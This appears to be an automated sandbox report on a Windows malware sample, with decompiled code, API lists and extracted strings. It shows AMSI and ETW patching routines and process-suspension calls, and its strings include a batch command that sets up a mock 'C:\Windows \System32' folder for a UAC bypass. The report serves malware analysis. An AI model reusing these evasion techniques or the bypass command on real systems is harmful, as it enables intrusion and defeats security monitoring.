                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xadc)));
                                                                                                				_t1268 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xae0, E02174D64(_t1268));
                                                                                                				_pop(_t2118);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xae0)), _t1809, _t2118, _t2297);
                                                                                                				E02174A98(_t2298 - 0xae4, "NtAccessCheck");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xae4)));
                                                                                                				_t1277 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xae8, E02174D64(_t1277));
                                                                                                				_pop(_t2121);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xae8)), _t1809, _t2121, _t2297);
                                                                                                				E02174A98(_t2298 - 0xaec, "NtAllocateUuids");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xaec)));
                                                                                                				_t1286 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xaf0, E02174D64(_t1286));
                                                                                                				_pop(_t2124);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xaf0)), _t1809, _t2124, _t2297);
                                                                                                				E02174A98(_t2298 - 0xaf4, "NtPrivilegeCheck");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xaf4)));
                                                                                                				_t1295 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xaf8, E02174D64(_t1295));
                                                                                                				_pop(_t2127);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xaf8)), _t1809, _t2127, _t2297);
                                                                                                				E02174A98(_t2298 - 0xafc, "NtSetSecurityObject");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xafc)));
                                                                                                				_t1304 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb00, E02174D64(_t1304));
                                                                                                				_pop(_t2130);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb00)), _t1809, _t2130, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb04, "NtQuerySecurityObject");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb04)));
                                                                                                				_t1313 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb08, E02174D64(_t1313));
                                                                                                				_pop(_t2133);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb08)), _t1809, _t2133, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xb0c, E02174D64( *((intOrPtr*)(_t2298 - 0xb10))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb0c)));
                                                                                                				_t1853 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xb18, _t1853, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xb14, E02174D64( *((intOrPtr*)(_t2298 - 0xb18))));
                                                                                                				_pop(_t2138); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb14)), _t1809, _t2138, _t2297); // executed
                                                                                                				E02174A98(_t2298 - 0xb1c, "NtCreateSection");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb1c)));
                                                                                                				_t1336 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb20, E02174D64(_t1336));
                                                                                                				_pop(_t2141);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb20)), _t1809, _t2141, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb24, "NtOpenSection");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb24)));
                                                                                                				_t1345 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb28, E02174D64(_t1345));
                                                                                                				_pop(_t2144);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb28)), _t1809, _t2144, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb2c, "NtMapViewOfSection");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb2c)));
                                                                                                				_t1354 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb30, E02174D64(_t1354));
                                                                                                				_pop(_t2147);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb30)), _t1809, _t2147, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb34, "NtCreateFile");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb34)));
                                                                                                				_t1363 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb38, E02174D64(_t1363));
                                                                                                				_pop(_t2150);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb38)), _t1809, _t2150, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb3c, "EtwEventWriteEx");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb3c)));
                                                                                                				_t1372 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb40, E02174D64(_t1372));
                                                                                                				_pop(_t2153);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb40)), _t1809, _t2153, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb44, "NtOpenFile");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb44)));
                                                                                                				_t1381 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb48, E02174D64(_t1381));
                                                                                                				_pop(_t2156);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb48)), _t1809, _t2156, _t2297);
                                                                                                				E02174A98(_t2298 - 0xb4c, "EtwEventWrite");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xb4c)));
                                                                                                				_t1390 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xb50, E02174D64(_t1390));
                                                                                                				_pop(_t2159);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xb50)), _t1809, _t2159, _t2297);
                                                                                                				ExitProcess(0); // executed
                                                                                                				_pop(_t2160);
                                                                                                				 *[fs:eax] = _t2160;
                                                                                                				_push(E0218E74C);
                                                                                                				E021748C4(_t2298 - 0xb50, 0x62);
                                                                                                				E021748C4(_t2298 - 0x9c0, 2);
                                                                                                				E021748C4(_t2298 - 0x9c8, 2);
                                                                                                				E021748C4(_t2298 - 0x9b8, 0x61);
                                                                                                				E021748A0(_t2298 - 0x828);
                                                                                                				E021748C4(_t2298 - 0x834, 3);
                                                                                                				E021748C4(_t2298 - 0x724, 0x5e);
                                                                                                				E021748C4(_t2298 - 0x5a8, 3);
                                                                                                				E021748A0(_t2298 - 0x5ac);
                                                                                                				E021748C4(_t2298 - 0x59c, 0x63);
                                                                                                				E021748C4(_t2298 - 0x410, 0x64);
                                                                                                				E021748C4(_t2298 - 0x280, 9);
                                                                                                				_t2171 =  *0x21885d4; // 0x21885d8
                                                                                                				E02175A10(_t2298 - 0x25c, _t2171);
                                                                                                				E021748C4(_t2298 - 0x258, 0x48);
                                                                                                				_t2173 =  *0x21885d4; // 0x21885d8
                                                                                                				E02175A10(_t2298 - 0x138, _t2173);
                                                                                                				E021748C4(_t2298 - 0x134, 0x11);
                                                                                                				E021748C4(_t2298 - 0xf0, 0xd);
                                                                                                				return E021748C4(_t2298 - 0xb8, 0x2e);
                                                                                                 			}
                                                                                                0x0218c957
                                                                                                0x0218c967
                                                                                                0x0218c97f
                                                                                                0x0218c98a
                                                                                                0x0218c991
                                                                                                0x0218c99c
                                                                                                0x0218c9b4
                                                                                                0x0218c9bf
                                                                                                0x0218c9c0
                                                                                                0x0218c9c5
                                                                                                0x0218c9ca
                                                                                                0x0218c9d0
                                                                                                0x0218c9e0
                                                                                                0x0218c9f8
                                                                                                0x0218ca03
                                                                                                0x0218ca0a
                                                                                                0x0218ca15
                                                                                                0x0218ca2d
                                                                                                0x0218ca38
                                                                                                0x0218ca39
                                                                                                0x0218ca3e
                                                                                                0x0218ca44
                                                                                                0x0218ca49
                                                                                                0x0218ca4e
                                                                                                0x0218ca53
                                                                                                0x0218ca59
                                                                                                0x0218ca69
                                                                                                0x0218ca81
                                                                                                0x0218ca8c
                                                                                                0x0218ca93
                                                                                                0x0218ca9e
                                                                                                0x0218cab6
                                                                                                0x0218cac1
                                                                                                0x0218cac2
                                                                                                0x0218cac7
                                                                                                0x0218cacc
                                                                                                0x0218cad2
                                                                                                0x0218cae2
                                                                                                0x0218cafa
                                                                                                0x0218cb05
                                                                                                0x0218cb0c
                                                                                                0x0218cb17
                                                                                                0x0218cb2f
                                                                                                0x0218cb3a
                                                                                                0x0218cb3b
                                                                                                0x0218cb40
                                                                                                0x0218cb52
                                                                                                0x0218cb5d
                                                                                                0x0218cb62
                                                                                                0x0218cb64
                                                                                                0x0218cb6a
                                                                                                0x0218cb6f
                                                                                                0x0218cb75
                                                                                                0x0218cb85
                                                                                                0x0218cb9d
                                                                                                0x0218cba8
                                                                                                0x0218cbaf
                                                                                                0x0218cbba
                                                                                                0x0218cbd2
                                                                                                0x0218cbdd
                                                                                                0x0218cbde
                                                                                                0x0218cbe3
                                                                                                0x0218cbe8
                                                                                                0x0218cbf5
                                                                                                0x0218cc07
                                                                                                0x0218cc0c
                                                                                                0x0218cc11
                                                                                                0x0218cc17
                                                                                                0x0218cc27
                                                                                                0x0218cc3f
                                                                                                0x0218cc4a
                                                                                                0x0218cc51
                                                                                                0x0218cc5c
                                                                                                0x0218cc74
                                                                                                0x0218cc7f
                                                                                                0x0218cc80
                                                                                                0x0218cc8a
                                                                                                0x0218cc8f
                                                                                                0x0218cca1
                                                                                                0x0218ccac
                                                                                                0x0218ccbe
                                                                                                0x0218ccc6
                                                                                                0x0218ccc9
                                                                                                0x0218ccdb
                                                                                                0x0218cce6
                                                                                                0x0218ccf8
                                                                                                0x0218cd00
                                                                                                0x0218cd03
                                                                                                0x0218cd15
                                                                                                0x0218cd20
                                                                                                0x0218cd32
                                                                                                0x0218cd3a
                                                                                                0x0218cd3d
                                                                                                0x0218cd4f
                                                                                                0x0218cd5a
                                                                                                0x0218cd6c
                                                                                                0x0218cd74
                                                                                                0x0218cd77
                                                                                                0x0218cd89
                                                                                                0x0218cd94
                                                                                                0x0218cda6
                                                                                                0x0218cdae
                                                                                                0x0218cdb1
                                                                                                0x0218cdc3
                                                                                                0x0218cdc8
                                                                                                0x0218cdce
                                                                                                0x0218cde0
                                                                                                0x0218cde8
                                                                                                0x0218cdea
                                                                                                0x0218cdea
                                                                                                0x0218cdeb
                                                                                                0x0218cdf0
                                                                                                0x0218cdf6
                                                                                                0x0218ce06
                                                                                                0x0218ce1e
                                                                                                0x0218ce29
                                                                                                0x0218ce30
                                                                                                0x0218ce3b
                                                                                                0x0218ce53
                                                                                                0x0218ce5e
                                                                                                0x0218ce5f
                                                                                                0x0218ce64
                                                                                                0x0218ce69
                                                                                                0x0218ce6f
                                                                                                0x0218ce7f
                                                                                                0x0218ce97
                                                                                                0x0218cea2
                                                                                                0x0218cea9
                                                                                                0x0218ceb4
                                                                                                0x0218cecc
                                                                                                0x0218ced7
                                                                                                0x0218ced8
                                                                                                0x0218cedd
                                                                                                0x0218cee7
                                                                                                0x0218ceec
                                                                                                0x0218cef2
                                                                                                0x0218cefc
                                                                                                0x0218cf01
                                                                                                0x0218cf07
                                                                                                0x0218cf11
                                                                                                0x0218cf16
                                                                                                0x0218cf1c
                                                                                                0x0218cf21
                                                                                                0x0218cf27
                                                                                                0x0218cf37
                                                                                                0x0218cf4f
                                                                                                0x0218cf5a
                                                                                                0x0218cf61
                                                                                                0x0218cf6c
                                                                                                0x0218cf84
                                                                                                0x0218cf8f
                                                                                                0x0218cf90
                                                                                                0x0218cf95
                                                                                                0x0218cf9a
                                                                                                0x0218cfa0
                                                                                                0x0218cfb0
                                                                                                0x0218cfc8
                                                                                                0x0218cfd3
                                                                                                0x0218cfda
                                                                                                0x0218cfe5
                                                                                                0x0218cffd
                                                                                                0x0218d008
                                                                                                0x0218d009
                                                                                                0x0218d016
                                                                                                0x0218d021
                                                                                                0x0218d032
                                                                                                0x0218d03c
                                                                                                0x0218d041
                                                                                                0x0218d046
                                                                                                0x0218d04c
                                                                                                0x0218d05c
                                                                                                0x0218d074
                                                                                                0x0218d07f
                                                                                                0x0218d086
                                                                                                0x0218d091
                                                                                                0x0218d0a9
                                                                                                0x0218d0b4
                                                                                                0x0218d0b5
                                                                                                0x0218d0ba
                                                                                                0x0218d0bf
                                                                                                0x0218d0c5
                                                                                                0x0218d0d5
                                                                                                0x0218d0ed
                                                                                                0x0218d0f8
                                                                                                0x0218d0ff
                                                                                                0x0218d10a
                                                                                                0x0218d122
                                                                                                0x0218d12d
                                                                                                0x0218d12e
                                                                                                0x0218d133
                                                                                                0x0218d145
                                                                                                0x0218d155
                                                                                                0x0218d15a
                                                                                                0x0218d15f
                                                                                                0x0218d165
                                                                                                0x0218d175
                                                                                                0x0218d18d
                                                                                                0x0218d198
                                                                                                0x0218d19f
                                                                                                0x0218d1aa
                                                                                                0x0218d1c2
                                                                                                0x0218d1cd
                                                                                                0x0218d1ce
                                                                                                0x0218d1d3
                                                                                                0x0218d1d8
                                                                                                0x0218d1de
                                                                                                0x0218d1ee
                                                                                                0x0218d206
                                                                                                0x0218d211
                                                                                                0x0218d218
                                                                                                0x0218d223
                                                                                                0x0218d23b
                                                                                                0x0218d246
                                                                                                0x0218d247
                                                                                                0x0218d24c
                                                                                                0x0218d25e
                                                                                                0x0218d263
                                                                                                0x0218d268
                                                                                                0x0218d26e
                                                                                                0x0218d27e
                                                                                                0x0218d296
                                                                                                0x0218d2a1
                                                                                                0x0218d2a8
                                                                                                0x0218d2b3
                                                                                                0x0218d2cb
                                                                                                0x0218d2d6
                                                                                                0x0218d2d7
                                                                                                0x0218d2dc
                                                                                                0x0218d2e1
                                                                                                0x0218d2e7
                                                                                                0x0218d2f7
                                                                                                0x0218d30f
                                                                                                0x0218d31a
                                                                                                0x0218d321
                                                                                                0x0218d32c
                                                                                                0x0218d344
                                                                                                0x0218d34f
                                                                                                0x0218d350
                                                                                                0x0218d355
                                                                                                0x0218d35b
                                                                                                0x0218d360
                                                                                                0x0218d365
                                                                                                0x0218d36b
                                                                                                0x0218d37b
                                                                                                0x0218d393
                                                                                                0x0218d39e
                                                                                                0x0218d3a5
                                                                                                0x0218d3b0
                                                                                                0x0218d3c8
                                                                                                0x0218d3d3
                                                                                                0x0218d3d4
                                                                                                0x0218d3d9
                                                                                                0x0218d3de
                                                                                                0x0218d3e4
                                                                                                0x0218d3f4
                                                                                                0x0218d40c
                                                                                                0x0218d417
                                                                                                0x0218d41e
                                                                                                0x0218d429
                                                                                                0x0218d441
                                                                                                0x0218d44c
                                                                                                0x0218d44d
                                                                                                0x0218e164
                                                                                                0x0218e165
                                                                                                0x0218e177
                                                                                                0x0218e182
                                                                                                0x0218e183
                                                                                                0x0218e193
                                                                                                0x0218e19e
                                                                                                0x0218e19f
                                                                                                0x0218e1b1
                                                                                                0x0218e1bc
                                                                                                0x0218e1bd
                                                                                                0x0218e1cd
                                                                                                0x0218e1d8
                                                                                                0x0218e1d9
                                                                                                0x0218e1eb
                                                                                                0x0218e1f6
                                                                                                0x0218e1f7
                                                                                                0x0218e207
                                                                                                0x0218e212
                                                                                                0x0218e213
                                                                                                0x0218e225
                                                                                                0x0218e230
                                                                                                0x0218e231
                                                                                                0x0218e241
                                                                                                0x0218e24c
                                                                                                0x0218e24d
                                                                                                0x0218e25f
                                                                                                0x0218e26a
                                                                                                0x0218e26b
                                                                                                0x0218e27b
                                                                                                0x0218e286
                                                                                                0x0218e287
                                                                                                0x0218e299
                                                                                                0x0218e2a4
                                                                                                0x0218e2a5
                                                                                                0x0218e2b5
                                                                                                0x0218e2c0
                                                                                                0x0218e2c1
                                                                                                0x0218e2d3
                                                                                                0x0218e2de
                                                                                                0x0218e2df
                                                                                                0x0218e2ef
                                                                                                0x0218e2fa
                                                                                                0x0218e2fb
                                                                                                0x0218e30d
                                                                                                0x0218e318
                                                                                                0x0218e319
                                                                                                0x0218e329
                                                                                                0x0218e334
                                                                                                0x0218e335
                                                                                                0x0218e347
                                                                                                0x0218e352
                                                                                                0x0218e353
                                                                                                0x0218e363
                                                                                                0x0218e36e
                                                                                                0x0218e36f
                                                                                                0x0218e381
                                                                                                0x0218e38c
                                                                                                0x0218e38d
                                                                                                0x0218e39d
                                                                                                0x0218e3a8
                                                                                                0x0218e3a9
                                                                                                0x0218e3bb
                                                                                                0x0218e3c6
                                                                                                0x0218e3c7
                                                                                                0x0218e3d7
                                                                                                0x0218e3e2
                                                                                                0x0218e3e3
                                                                                                0x0218e3f5
                                                                                                0x0218e400
                                                                                                0x0218e401
                                                                                                0x0218e406
                                                                                                0x0218e40b
                                                                                                0x0218e411
                                                                                                0x0218e421
                                                                                                0x0218e439
                                                                                                0x0218e444
                                                                                                0x0218e44b
                                                                                                0x0218e456
                                                                                                0x0218e46e
                                                                                                0x0218e479
                                                                                                0x0218e47a
                                                                                                0x0218e48a
                                                                                                0x0218e495
                                                                                                0x0218e496
                                                                                                0x0218e4a8
                                                                                                0x0218e4b3
                                                                                                0x0218e4b4
                                                                                                0x0218e4c4
                                                                                                0x0218e4cf
                                                                                                0x0218e4d0
                                                                                                0x0218e4e2
                                                                                                0x0218e4ed
                                                                                                0x0218e4ee
                                                                                                0x0218e4fe
                                                                                                0x0218e509
                                                                                                0x0218e50a
                                                                                                0x0218e51c
                                                                                                0x0218e527
                                                                                                0x0218e528
                                                                                                0x0218e538
                                                                                                0x0218e543
                                                                                                0x0218e544
                                                                                                0x0218e556
                                                                                                0x0218e561
                                                                                                0x0218e562
                                                                                                0x0218e572
                                                                                                0x0218e57d
                                                                                                0x0218e57e
                                                                                                0x0218e590
                                                                                                0x0218e59b
                                                                                                0x0218e59c
                                                                                                0x0218e5ac
                                                                                                0x0218e5b7
                                                                                                0x0218e5b8
                                                                                                0x0218e5ca
                                                                                                0x0218e5d5
                                                                                                0x0218e5d6
                                                                                                0x0218e5e6
                                                                                                0x0218e5f1
                                                                                                0x0218e5f2
                                                                                                0x0218e604
                                                                                                0x0218e60f
                                                                                                0x0218e610
                                                                                                0x0218e617
                                                                                                0x0218e61e
                                                                                                0x0218e621
                                                                                                0x0218e624
                                                                                                0x0218e634
                                                                                                0x0218e644
                                                                                                0x0218e654
                                                                                                0x0218e664
                                                                                                0x0218e66f
                                                                                                0x0218e67f
                                                                                                0x0218e68f
                                                                                                0x0218e69f
                                                                                                0x0218e6aa
                                                                                                0x0218e6ba
                                                                                                0x0218e6ca
                                                                                                0x0218e6da
                                                                                                0x0218e6e5
                                                                                                0x0218e6eb
                                                                                                0x0218e6fb
                                                                                                0x0218e706
                                                                                                0x0218e70c
                                                                                                0x0218e71c
                                                                                                0x0218e72c
                                                                                                0x0218e741

                                                                                                APIs
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                  • Part of subcall function 021889A4: _lcreat.KERNEL32(00000000,00000000), ref: 021889DB
                                                                                                  • Part of subcall function 021889A4: _lwrite.KERNEL32(00000000,00000000,?,00000000,02188A21), ref: 021889FB
                                                                                                  • Part of subcall function 021889A4: _lclose.KERNEL32(00000000), ref: 02188A01
                                                                                                  • Part of subcall function 021780F8: GetFileAttributesA.KERNEL32(00000000,?,02189493,ScanString,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178103
                                                                                                  • Part of subcall function 02188A30: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B48
                                                                                                  • Part of subcall function 02188A30: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B5F
                                                                                                  • Part of subcall function 02188A30: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B68
                                                                                                  • Part of subcall function 02188A30: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B71
                                                                                                • Sleep.KERNEL32(00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,KDECO.bat,0218E8D8,ScanString), ref: 0218CC8A
                                                                                                • DeleteFileA.KERNEL32(00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,KDECO.bat,0218E8D8), ref: 0218CCBE
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,KDECO.bat), ref: 0218CCF8
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 0218CD32
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession), ref: 0218CD6C
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C), ref: 0218CDA6
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer), ref: 0218CDE0
                                                                                                • WinExec.KERNEL32 ref: 0218D032
                                                                                                • Sleep.KERNEL32(000001F4,00000000,00000000,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,ScanString,0218E77C,ScanBuffer,0218E77C,OpenSession), ref: 0218D03C
                                                                                                  • Part of subcall function 021857D0: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02185893
                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000DF8,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,000001F4,00000000,00000000,OpenSession,0218E77C), ref: 0218D259
                                                                                                • NtSuspendThread.N(00000850,OpenSession,0218E77C,ScanBuffer,0218E77C,001F0FFF,00000000,00000DF8,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C), ref: 0218D35B
                                                                                                • InetIsOffline.URL(00000000,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,00000850,OpenSession,0218E77C,ScanBuffer,0218E77C,001F0FFF,00000000,00000DF8,OpenSession), ref: 0218D4D6
                                                                                                • ZwClose.N(00000850,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,00000000,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,00000850,OpenSession), ref: 0218D67C
                                                                                                • InetIsOffline.URL(00000000,ScanString,0218E77C,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,ScanString,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer), ref: 0218D836
                                                                                                • InetIsOffline.URL(00000000,OpenSession,0218E77C,ScanString,0218E77C,ScanString,0218E77C,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,ScanString,0218E77C,ScanBuffer), ref: 0218DA2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Delete$CloseHandleInetOfflineProcess$LibraryMemorySleep$AddressAttributesCompareCreateCurrentExecFlushFreeLoadModuleMoveObjectOpenProcSingleStringSuspendThreadVirtualWait_lclose_lcreat_lwrite
                                                                                                • String ID: 5E5CDDEE$C:\Windows\System32\$CreateRemoteThreadEx $EtwEventWrite$EtwEventWriteEx$Initialize$KDECO.bat$KernelBase$LdrGetDllHandle$LdrLoadDll$LdrQueryProcessModuleInformation$NtAccessCheck$NtAccessCheckAndAuditAlarm$NtAllocateUuids$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenSection$NtPrivilegeCheck$NtPrivilegeObjectAuditAlarm$NtPrivilegedServiceAuditAlarm$NtQuerySecurityObject$NtSetSecurityObject$O.bat$OpenSession$ReportEventA$ReportEventW$ScanBuffer$ScanString$SetEncryptedFileMetadata$UacInitialize$UacScan$VirtualAlloc$VirtualProtect$advapi32$easinvoker.exe$kernel32$kernelbase$mkdir "\\?\C:\Windows " mkdir "\\?\C:\Windows \System32"ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y"C:\Wi$netutils.dll
                                                                                                • API String ID: 337110212-3532920570
                                                                                                • Opcode ID: cdca9848481a8ecbae7335fbec07eda1c7de337dccb3a363f10516e34bac649c
                                                                                                • Instruction ID: 9ef62a21aff2f752fa3945ec9bb83c185c2f20987d7555e1c268f1d8f877231d
                                                                                                • Opcode Fuzzy Hash: cdca9848481a8ecbae7335fbec07eda1c7de337dccb3a363f10516e34bac649c
                                                                                                • Instruction Fuzzy Hash: D503DF79AC02599FDB30FB64DD80ADE73F6ABC9700F1084E6A549A7200DF319E918F95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3328 2175d0c-2175d4d GetModuleFileNameA RegOpenKeyExA 3329 2175d8f-2175dd2 call 2175b48 RegQueryValueExA 3328->3329 3330 2175d4f-2175d6b RegOpenKeyExA 3328->3330 3335 2175df6-2175e10 RegCloseKey 3329->3335 3336 2175dd4-2175df0 RegQueryValueExA 3329->3336 3330->3329 3332 2175d6d-2175d89 RegOpenKeyExA 3330->3332 3332->3329 3334 2175e18-2175e49 lstrcpynA GetThreadLocale GetLocaleInfoA 3332->3334 3337 2175f32-2175f39 3334->3337 3338 2175e4f-2175e53 3334->3338 3336->3335 3339 2175df2 3336->3339 3341 2175e55-2175e59 3338->3341 3342 2175e5f-2175e75 lstrlenA 3338->3342 3339->3335 3341->3337 3341->3342 3343 2175e78-2175e7b 3342->3343 3344 2175e87-2175e8f 3343->3344 3345 2175e7d-2175e85 3343->3345 3344->3337 3347 2175e95-2175e9a 3344->3347 3345->3344 3346 2175e77 3345->3346 3346->3343 3348 2175ec4-2175ec6 3347->3348 3349 2175e9c-2175ec2 lstrcpynA LoadLibraryExA 3347->3349 3348->3337 3350 2175ec8-2175ecc 3348->3350 3349->3348 3350->3337 3351 2175ece-2175efe lstrcpynA LoadLibraryExA 3350->3351 3351->3337 3352 2175f00-2175f30 lstrcpynA LoadLibraryExA 3351->3352 3352->3337
                                                                                                C-Code - Quality: 86%
                                                                                                			E02175D0C(CHAR* __eax) {
                                                                                                				CHAR* _v8;
                                                                                                				void* _v12;
                                                                                                				char _v15;
                                                                                                				char _v17;
                                                                                                				char _v18;
                                                                                                				char _v22;
                                                                                                				int _v28;
                                                                                                				char _v289;
                                                                                                				long _t44;
                                                                                                				long _t61;
                                                                                                				long _t63;
                                                                                                				CHAR* _t74;
                                                                                                				CHAR* _t99;
                                                                                                				CHAR* _t100;
                                                                                                				intOrPtr _t104;
                                                                                                				struct HINSTANCE__* _t112;
                                                                                                				void* _t115;
                                                                                                				void* _t117;
                                                                                                				intOrPtr _t118;
                                                                                                
                                                                                                				_t115 = _t117;
                                                                                                				_t118 = _t117 + 0xfffffee0;
                                                                                                				_v8 = __eax;
                                                                                                				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                                                				_v22 = 0;
